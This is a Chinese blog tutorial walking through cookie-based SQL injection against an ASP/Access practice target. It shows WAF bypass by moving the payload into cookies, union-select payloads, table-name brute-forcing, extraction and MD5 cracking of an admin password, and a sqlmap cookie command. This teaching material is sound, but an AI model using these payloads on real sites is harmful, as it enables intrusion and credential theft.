Access注入--cookie注入

最新推荐文章于 2024-05-30 16:16:07 发布
最新推荐文章于 2024-05-30 16:16:07 发布
阅读量252 收藏
点赞数
分类专栏: SQL注入 文章标签: web access
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45922278/article/details/109134077
版权

                                           Access注入--cookie注入

 

针对老网站: asp aspx php<5.4以下>

 

题目: http://59.63.200.79:8004

 

1.http://59.63.200.79:8004/shownews.asp?id=171-1

#页面有变化,存在注入

 

2.http://59.63.200.79:8004/shownews.asp?id=171' and order by 1 -- qwe

#检测到非法字符,有防护.

怎么绕过:

1.规则绕过:

          1.用其他函数替换要用的函数

          2.用一些大小写或其他的方法去绕过

2.让waf不再对我们检测

 

id=171        GET传参

                   POST传参

                   Cookie传参 = header传参

                   PHP中的 $REQUEST['id'] 可以接收GET传参,POST传参,Cookie传参

                   注:php5.4以上不会接收Cookie传参

 

设置Cookie:ookie使用需要URL编码

1.浏览器F12,Applica,Cookies

2.burp 抓包,URL编码,添加cookie,重放

3.浏览器F12,Console js控制台, document.cookie="id="+escape("171 order by 10")

删除URL中的id=171,重新进入网页.

 

3.document.cookie="id="+escape("171 order by 11")

#10,正常 11,异常 有10个字段

 

4.document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10")

#报错,因为数据库不同,Access数据库是非常老的数据库,MySQL语法不同

#access:没有系统自带表,没有库名

强行猜测: user admin news job

 

5.document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from user...")

#强猜表名 使用burp,添加sqlmap中的表名字典进行爆破

 

6.document.cookie="id="+escape("171 union select 1,2,3,4,5,6,7,8,9,10 from admin")

#报出2,3,字段点,字段名也需要强猜.

 

7.document.cookie="id="+escape("171 union select 1,username,password,4,5,6,7,8,9,10 from admin")

#得出username:admin

 password:b9a2a2b5dffb918c

 

8, b9a2a2b5dffb918c MD5解码: welcome

 

使用sqlmap工具跑Cookie注入:

sqlmap.py -u "http://...../.../.asp" --cookie "id=171" --level 2

 

Cookie注入的核心: 传参的方式不同

        asp(很常见10 9个)

        PHP(10 1个)

        jsp(100 1~2个)

cookie注入和数据库没有关系

         Access

        mysql

        oracle

        mssql

        DB2

New6ie
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
asp终极防范SQL注入漏洞
01-02
下面给出4个函数,足够你抵挡一切SQL注入漏洞!读懂代码,你就能融会贯通。 注意要对所有的request对象进行过滤:包括 request.cookie, request.ServerVariables 等等容易被忽视的对象: 代码如下: function killn...
强大的国外注入工具-darkMySQLi.py
09-22
[+] Do we have Access to MySQL Database: YES <-- w00t w00t [!] http://www.rayner.com/products.php?id=22/**/AND/**/1=2/**/UNION/**/SELECT/**/1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+FROM+mysql ....
Access数据库注入之cookie注入
seek_2022的博客
05-02 1720
文章目录一、cookie注入简介(一)什么是cookie(二)为什么会存在cookie注入?二、如何修改cookie(一)通过Javascript来设置Cookie(二)通过浏览器的Application来修改(三)通过burp抓包去修改cookie(四)通过浏览器插件进行修改三、cookie注入靶场思路(一)靶场需要注意的地方(二)如何删除GET传参(三)access数据库注入的特点四、靶场实战(一)测试cookie传参(二)测试cookie注入(三)爆破表名(四)判断字段数(五)判断显错位(六)查询ad
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1212
Cookie注入简介 什么是Cookie? Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
Access注入之Cookie注入
最新发布
白帽黑客八哥的博客
05-30 1392
注:Cookie传参值需要URL编码Cookie 是指某些网站为了辨别用户身份而储存在用户本地终端上的数据(通常经过加密通俗来讲,Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。Cookie 的出现是为了给用户更好的体验性,从安全的角度来讲,Cookie本身就是不安全的。
封神台 第二章 绕过WAF
m0_65712192的博客
10-14 752
封神台 第二章 利用ModHeader绕过WAF
绕过sql新姿势
小城的博客
01-06 203
如上图所述,此时的id地址为xxxid=170 由于该靶场过滤了常规字符,所以只能另辟蹊径绕过 我们尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。 我们打开Chrome浏览器,这里用到了ModHeader插件 ModHeader插件是一款强大的插件,可以让我们可以自定义HTTP请求头或者是重写响应头,包括新增请求头/响应头或者覆盖Chrome浏览器设置的请求头的默认值,同时还可以根据URL Pattern来只对特定网站生效。 我们点击+号新增一个Re.
封神台的困难与复现
CLANCY的博客
11-29 176
第二章:遇到阻难!绕过WAF过滤! 我们尝试,将测试语句放到cookie里面,再发送给服务器,因为网页防护一般只拦截Get、post传参。 我们打开火狐浏览器,这里用到了ModHeader插件 我们点击+号新增一个Request头。 我们添加一个Cookie头,并写值为id=171,并确保已开启(打勾) 我们直接访问http://59.63.200.79:8004/shownews.asp返回显示正常 这证明cookie里的id=171,也能正常传参,被当作sql语句拼接。那我们直接进行注入
SQLMAP的注入使用
05-13
该命令用于判断目标网站是否存在Cookie注入漏洞。 3. python SQLmap.py -u "xxxx.com" --data "xx=xx&xx=xx" 【判断url是否存在post注入】 该命令用于判断目标网站是否存在POST注入漏洞。 GET注入详解: * ...
Access数据库注入高级玩法.pdf
07-13
Access 数据库注入高级玩法 ...* cookie 注入语句 Access 数据库注入高级玩法是一种高级的数据库攻击技术,旨在攻击 Access 数据库,获取敏感信息。开发者应该注意防止 Access 数据库注入漏洞,保护数据库安全。
bjx.rar_BJX-A43D
09-19
1. **数据库交互**:ASP可以与SQL Server、Access等数据库进行交互,存储和检索商品信息、用户数据、订单详情等。 2. **session和cookie管理**:用于跟踪用户状态,如登录信息、购物车内容,确保安全性和个性化体验...
SQL注入之Cookie注入Access
秋水的博客
09-01 850
Cookie注入简介 什么是Cookie? Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。Cookie的出现是为了给用户更好的体现,从安全的角度来讲,Cookie本身就是不安全的 为什么可以Cookie利用进行注入? 在动态脚本语言中存在超全局变量可以获取多种传参方式(基本上) 很多时...
SQL注入系列之ASP+ACCESS手动注入(二)----Cookie注入
fendo
02-26 7233
一、简介 Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪,最典型的应用就是保存用户的账号和密码用来自动登录网站和电子商务网站中的“购物车”。 Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同,两者都是针对数
Access注入 — Cookie注入
Mr.Huang_的博客
09-02 164
一、Cookie注入简介 二、怎么修改Cookie 我们知道了Cookie注入的原理~那么下一步我们该学习的就是如何修改网站原有的Cookie 我们可以使用很多方法设置Cookie 这2点同时满足才可以执行!!!!!!!!!!! 1、只有旧的失效了(比如删了?id=170,也就是删了get传参),才会接受新的传参方式(比如这里的get传参失效,现在新的cookie传参才会生效) 2、如果由一种传参换成新的一种传参,第一次一定要在URL栏刷新,才会接受新的传参,否则还是接受原来的传参,第一次之后随便在那刷新
Access——Cookie注入
qq_45300786的博客
07-18 526
这里我们使用cookie来传参的,注意php5.4以上的版本就不会接受cookie传参了 下面我们就在本地服务器来试一试 先写一个php传参文件 然后进行传参,可发现,传参成功。 那么接下来我们就来使用cookie传参 ...
access学习_Access注入 — Cookie注入(学习笔记)
weixin_39742727的博客
11-21 136
理论Cookie的定义是这样的:Cookie是在HTTP协议下,服务器或脚本可以维护客户工作站上信息的一种方式。通常被用来辨别用户身份、进行session跟踪.Cookie注入简单来说就是利用Cookie而发起的注入攻击。从本质上来讲,Cookie注入与传统的SQL注入并无不同Cookie注入典型步骤1.寻找形如“.asp?id=xx”类的带参数的URL。2.去掉“id=xx”查看页面显示是否正常...
Access注入 — Cookie注入+偏移注入
m0_55854679的博客
02-13 1509
文章目录cookie注入什么是cookie什么是cookie注入设置cookie cookie注入 什么是cookie Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号。 什么是cookie注入 在动态脚本语言中存在超全局变量可以获取多种传参方式(基本上) 很多开发的时候为了考虑到多种接受参数,在接受参数的时候都是用多种解释传参的方法 例如:php中的$_REQUEST[] 可以获取POST|GET|COOKIE传
第二次靶场练习:cookie注入
weixin_30907523的博客
01-12 1844
cookie注入 本文章目的是对相关的黑客内容进一步了解,如有人违反相关的法律法规,本人概不负责 一、学习目的: 利用手工注入网站 利用sqlmab注入 二、附件说明 靶场网址:http://120.203.13.75:8001/shownews.asp 工具sqlmap下载:https://download.csdn.net/download/qq_41803...
网络安全从入门到精通 (第五章-1 )Access注入 — Cookie注入&偏移注入
weixin_43643758的博客
04-12 204
本文内容: Cookie注入简介 Cookie注入的核心 怎么修改Cookie Access数据库注入介绍 Cookie注入具体流程 偏移注入使用场景 偏移注入具体流程 前言:数据库有很多:   Mysql、Access、Mssql、Oracle   不同的数据库,虽然语句蕾西,但是在渗透测试的时候是不同的。    1,Cookie注入简介:   cookie:就是代表你...
Access-Control-
05-15
Access-Control-Allow-Credentials指定了资源是否允许跨域请求时发送Cookie等认证信息。 3. Access-Control-Allow-Methods Access-Control-Allow-Methods指定了允许的HTTP请求方法。 4. Access-Control-Allow-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值